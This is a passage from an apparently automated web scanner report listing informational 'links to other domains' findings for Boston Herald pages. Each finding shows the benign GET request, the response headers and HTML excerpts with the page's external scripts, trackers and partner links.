http://bostonherald.com/news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fdocument.bg%3Ff%3Dmisc%2F100216housing.pdf%26h%3DMassachusetts%2520Housing%2520Partnership%26k%3Dbh&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title="News & Opinion - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fdocument.bg%3Ff%3Dmisc%2F100216housing.pdf%26h%3DMassachusetts%2520Housing%2520Partnership%26k%3Dbh&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.154. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/projects/your_tax_dollars.bg?src=Mefa

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMefa&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMefa&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.155. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/search/?topic=Annette+Bening&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DAnnette%2BBening%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110116/stp/63c6c4_ltpgold20110116.jpg
http://multimedia.heraldinteractive.com/images/20110116/stp/96c1eb_finch_01172011.jpg
http://multimedia.heraldinteractive.com/images/20110116/stp/d8e594_bale_01172011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/07f4a8_oscars012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/3f7f4c_ltpwbone.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/5895cb_kings012611.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/a9de68_ctposcars.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg
http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Annette+Bening&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DAnnette%2BBening%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1312018&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1312018">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/5895cb_kings012611.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311966&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311847&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311847">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/a9de68_ctposcars.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/07f4a8_oscars012511.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/96c1eb_finch_01172011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1310045">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/63c6c4_ltpgold20110116.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309915&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309915">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/d8e594_bale_01172011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309992&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/track/inside_track/view.bg?articleid=1312550">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." alt="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character.">
</a>
...[SNIP]...
icleid=1312550" title="Moore’s the merrier at Hasty festivities"
onclick="switchPhoto('198088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
g?articleid=1312018" title="Hometown flicks garner several Oscar nods"
onclick="switchPhoto('197841');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197841" src="http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg" title="Mark Wahlberg as Micky Ward and Christian Bale as Dick Eckland in a scene from the Lowell-based flick, ‘The Fighter,’ nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
